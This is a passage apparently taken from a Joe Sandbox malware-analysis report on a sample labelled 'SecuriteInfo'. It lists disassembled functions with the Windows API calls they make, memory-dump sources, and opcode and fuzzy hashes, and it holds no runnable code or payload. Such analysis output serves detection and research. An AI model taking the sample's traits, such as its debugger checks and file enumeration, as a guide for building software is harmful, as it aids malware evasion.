                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: <> "$ = "$Hide$Show
                                                                                                                                                                        • API String ID: 0-289022205
                                                                                                                                                                        • Opcode ID: cba8aeb80f2563e51b3bcc5708327b38d10eaec2774ffd3d31fa8d9a4700f6eb
                                                                                                                                                                        • Instruction ID: 4885366dee1c4bafab48f0f85d355fa181756b11b98119ad601700dcbeaefa6d
                                                                                                                                                                        • Opcode Fuzzy Hash: cba8aeb80f2563e51b3bcc5708327b38d10eaec2774ffd3d31fa8d9a4700f6eb
                                                                                                                                                                        • Instruction Fuzzy Hash: A4F15870D04298DFDB14DF64CC55BADBBB0BF55304F1086D9E4097B292EB71AA84CBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BB7480 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetVersionExW.KERNEL32 ref: 00D799C8
                                                                                                                                                                        • GetVersionExW.KERNEL32(?), ref: 00D79A13
                                                                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(00000011), ref: 00D79A27
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Version$FeaturePresentProcessor
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1871528217-0
                                                                                                                                                                        • Opcode ID: 1a50d8904100fae985c49a40a7e0e16d9922506cf839c48e0922845d216f1535
                                                                                                                                                                        • Instruction ID: cbcc2f9952aed3ce33315677d8d6f3997c188043535539cb7b0a53ace794e510
                                                                                                                                                                        • Opcode Fuzzy Hash: 1a50d8904100fae985c49a40a7e0e16d9922506cf839c48e0922845d216f1535
                                                                                                                                                                        • Instruction Fuzzy Hash: AA611A72B142244FE708CF2ECC955AABBD5DBC9341F04863FE49AD7291E678C509CBA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CB1410 Relevance: 4.7, APIs: 3, Instructions: 190fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?,?,1FC3D414,?), ref: 00CB14DC
                                                                                                                                                                        • FindNextFileW.KERNEL32(000000FF,00000010,?,1FC3D414,?), ref: 00CB1633
                                                                                                                                                                        • FindClose.KERNEL32(000000FF,?,?,1FC3D414,?), ref: 00CB1692
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Find$File$CloseFirstNext
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3541575487-0
                                                                                                                                                                        • Opcode ID: 2b3edb98ccd8f535ca664da57a22a2e76e44f246531ab68136e0249b5dd047eb
                                                                                                                                                                        • Instruction ID: 3e2a4f626061c0d090844f3a75d541142eb7ac85a0ed2b43e93637f37a4c1458
                                                                                                                                                                        • Opcode Fuzzy Hash: 2b3edb98ccd8f535ca664da57a22a2e76e44f246531ab68136e0249b5dd047eb
                                                                                                                                                                        • Instruction Fuzzy Hash: 0B818C70D01259DFDB24DF68CD99BEDB7B8EF44300F548299E815A7291DB706E88CB90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BCEFE0 Relevance: 4.6, APIs: 3, Instructions: 93COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • IsWindow.USER32(00000004), ref: 00BCF02E
                                                                                                                                                                        • GetWindowLongW.USER32(00000004,000000FC), ref: 00BCF047
                                                                                                                                                                        • SetWindowLongW.USER32(00000004,000000FC,?), ref: 00BCF059
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$Long
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 847901565-0
                                                                                                                                                                        • Opcode ID: 88dfaff1decf84be5fbe8066ef46183c70eb39ac296e6e7da9a59cef3182031d
                                                                                                                                                                        • Instruction ID: 6d9617afc45279b9301e9e7e17fc48dfec4fe9b63b94bd5422863d03648fe71f
                                                                                                                                                                        • Opcode Fuzzy Hash: 88dfaff1decf84be5fbe8066ef46183c70eb39ac296e6e7da9a59cef3182031d
                                                                                                                                                                        • Instruction Fuzzy Hash: D1419CB0604602EFDB10DF65C908B6AFBF4FF04714F1042A9E46897691D776E918CBA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD2C90 Relevance: 4.6, APIs: 3, Instructions: 87COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetWindowLongW.USER32(00000003,000000FC), ref: 00BD2CE6
                                                                                                                                                                        • SetWindowLongW.USER32(00000003,000000FC,?), ref: 00BD2CF8
                                                                                                                                                                        • DeleteCriticalSection.KERNEL32(?,1FC3D414,?,?,?,?,00DAD5E4,000000FF), ref: 00BD2D23
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: LongWindow$CriticalDeleteSection
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1978754570-0
                                                                                                                                                                        • Opcode ID: 6ee4d0f7e8583e0a694a4f90ee0b77b8b5760df406a0aa9ee634ad5733251ade
                                                                                                                                                                        • Instruction ID: 181452dfe7d96b22dde9a9437b9f840687e4a8620ca2d7a83b4ddb2fce23d1ab
                                                                                                                                                                        • Opcode Fuzzy Hash: 6ee4d0f7e8583e0a694a4f90ee0b77b8b5760df406a0aa9ee634ad5733251ade
                                                                                                                                                                        • Instruction Fuzzy Hash: 3931A271904646BFCB11DF69CC04B99FBE8FF15310F24426AE864A7692E771E918CBA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00D850F3 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00D851EB
                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00D851F5
                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00D85202
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3906539128-0
                                                                                                                                                                        • Opcode ID: 0be1b9c3e5ffeb7678be0f7b8716590f39a9039f3fb0c539cd4105cc96737219
                                                                                                                                                                        • Instruction ID: 704aa801d29edd41f778e893df0b97fc9417df23d146038a915f97e7b3c19c01
                                                                                                                                                                        • Opcode Fuzzy Hash: 0be1b9c3e5ffeb7678be0f7b8716590f39a9039f3fb0c539cd4105cc96737219
                                                                                                                                                                        • Instruction Fuzzy Hash: 2A3105709412289BCB21EF24D98978DBBB8FF18710F1041EAE51CA7250EB309F858F64
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BBA000 Relevance: 4.6, APIs: 3, Instructions: 65COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000,1FC3D414,00000001,00000000,?,00000000,00DA7D20,000000FF,?,00BB9FAC,?,?,00BBA150,00000000,00000000), ref: 00BBA02B
                                                                                                                                                                        • LockResource.KERNEL32(00000000,?,00BB9FAC,?,?,00BBA150,00000000,00000000,00000000,00BBA2B8,-00000010,?,00000000), ref: 00BBA036
                                                                                                                                                                        • SizeofResource.KERNEL32(00000000,00000000,?,00BB9FAC,?,?,00BBA150,00000000,00000000,00000000,00BBA2B8,-00000010,?,00000000), ref: 00BBA044
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Resource$LoadLockSizeof
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2853612939-0
                                                                                                                                                                        • Opcode ID: ffe0fa3fbaa47d42f455a39145db902bd704b6288e5a228c65a9e08265430627
                                                                                                                                                                        • Instruction ID: 9ac33d4ecbe4c09d266556c91cea164e198bfd44419f75d90eb62ad82e3f3336
                                                                                                                                                                        • Opcode Fuzzy Hash: ffe0fa3fbaa47d42f455a39145db902bd704b6288e5a228c65a9e08265430627
                                                                                                                                                                        • Instruction Fuzzy Hash: C9110A72E046549FC7349F19DC44BBAF7ECEB88721F404A7BEC5AD3240EA759C048690
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00D90040 Relevance: 3.4, APIs: 2, Instructions: 449COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 832ffafa89fc57beda716dce77b95418215a364c390a83f0d99b221e7f9869f1
                                                                                                                                                                        • Instruction ID: 65c038aa0b013c92e0c4bb47a552dce42cc205b22647f4adeedc6d93052cb113
                                                                                                                                                                        • Opcode Fuzzy Hash: 832ffafa89fc57beda716dce77b95418215a364c390a83f0d99b221e7f9869f1
                                                                                                                                                                        • Instruction Fuzzy Hash: BAF12E71E012199FDF14CFA8D8806ADBBB1FF88314F198269E915EB391D730AD45CBA4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BDF9F0 Relevance: 3.3, APIs: 2, Instructions: 258windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SendMessageW.USER32(?,0000102B,00000000,00000001), ref: 00BDFB1B
                                                                                                                                                                        • SendMessageW.USER32(?,0000102B,?,-00000002), ref: 00BDFD05
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3850602802-0
                                                                                                                                                                        • Opcode ID: daa6762adaf30d240f37ea48797c7f7fff7f5be4239780185b2f99115c80d8b7
                                                                                                                                                                        • Instruction ID: d927f51d6ab366f8b4fb5ce2343046312369e4bbc790acc254eb4b06c42a8c92
                                                                                                                                                                        • Opcode Fuzzy Hash: daa6762adaf30d240f37ea48797c7f7fff7f5be4239780185b2f99115c80d8b7
                                                                                                                                                                        • Instruction Fuzzy Hash: 63B18071A042479FCB18DF24C595BB9FBF5FB15304F1881AAE85ADB381E734A950CB90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CCC3D0 Relevance: 3.1, APIs: 2, Instructions: 126COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 307c24a36217b3ae4bb5e1046b5076502fa9a74a415fccd034f8a222c6db9e65
                                                                                                                                                                        • Instruction ID: bb18cd9b2470d244b61dcaba048b46ceab429dccfbbbcee30138ea03d2dd1c69
                                                                                                                                                                        • Opcode Fuzzy Hash: 307c24a36217b3ae4bb5e1046b5076502fa9a74a415fccd034f8a222c6db9e65
                                                                                                                                                                        • Instruction Fuzzy Hash: 4741BF319016499FDB28DF68C995BEDB3A4FF00320F54866DE829A72D1DB70AE44DB50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00C240A0 Relevance: 3.1, APIs: 2, Instructions: 75COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetWindowLongW.USER32(00000000,000000FC), ref: 00C2410F
                                                                                                                                                                        • SetWindowLongW.USER32(00000000,000000FC,?), ref: 00C2411D
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: LongWindow
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1378638983-0
                                                                                                                                                                        • Opcode ID: b28cce581e72a5599ed5b1380edf222c252703d89bbc71d44f753ff6edd1dbb0
                                                                                                                                                                        • Instruction ID: 9b336c774598e5521e5a8e5ee0bff62b25e6185744bed2d2b99bb149dfa0ece2
                                                                                                                                                                        • Opcode Fuzzy Hash: b28cce581e72a5599ed5b1380edf222c252703d89bbc71d44f753ff6edd1dbb0
                                                                                                                                                                        • Instruction Fuzzy Hash: FC31CE71904215EFCB20DF69D944B9AFBB4FF05320F14836AE424A7AD1D731AE54CBA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CCE270 Relevance: 3.1, APIs: 2, Instructions: 71fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • FindFirstFileW.KERNEL32(00000000,?,1FC3D414,?,00000000,00000000,00000000,00DE82FD,000000FF), ref: 00CCE2D8
                                                                                                                                                                        • FindClose.KERNEL32(00000000,?,1FC3D414,?,00000000,00000000,00000000,00DE82FD,000000FF), ref: 00CCE322
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2295610775-0
                                                                                                                                                                        • Opcode ID: ed848c5ecf625faa5d533bf8f27bd6b69a89458e31a636f06f195e565257881f
                                                                                                                                                                        • Instruction ID: 289bc388b227bf7d4d0cf8edf264c0b446190e50fa59564ee2be4d2ee166b914
                                                                                                                                                                        • Opcode Fuzzy Hash: ed848c5ecf625faa5d533bf8f27bd6b69a89458e31a636f06f195e565257881f
                                                                                                                                                                        • Instruction Fuzzy Hash: F421D671900949DFD710DF68DD49BAEB7B4FF84724F10426AF824A72D0EB305A08CB94
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00C6EF50 Relevance: 2.6, Strings: 2, Instructions: 86COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: T$$|$
                                                                                                                                                                        • API String ID: 0-3050406125
                                                                                                                                                                        • Opcode ID: 237814c37db868c402f647958dff7e341b21cc55401c314e983bf79629917aee
                                                                                                                                                                        • Instruction ID: d4da137151ce82a8baec1a3f617f9323d13fdcbaf19abdd3d4d2fe359e89bf86
                                                                                                                                                                        • Opcode Fuzzy Hash: 237814c37db868c402f647958dff7e341b21cc55401c314e983bf79629917aee
                                                                                                                                                                        • Instruction Fuzzy Hash: A74104B0905A45EED704CF69C50878AFBF0BB59318F20825ED458AB781D3B9A658CB94
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00D9AEF1 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00D9AEEC,?,?,00000008,?,?,00DA60D7,00000000), ref: 00D9B11E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
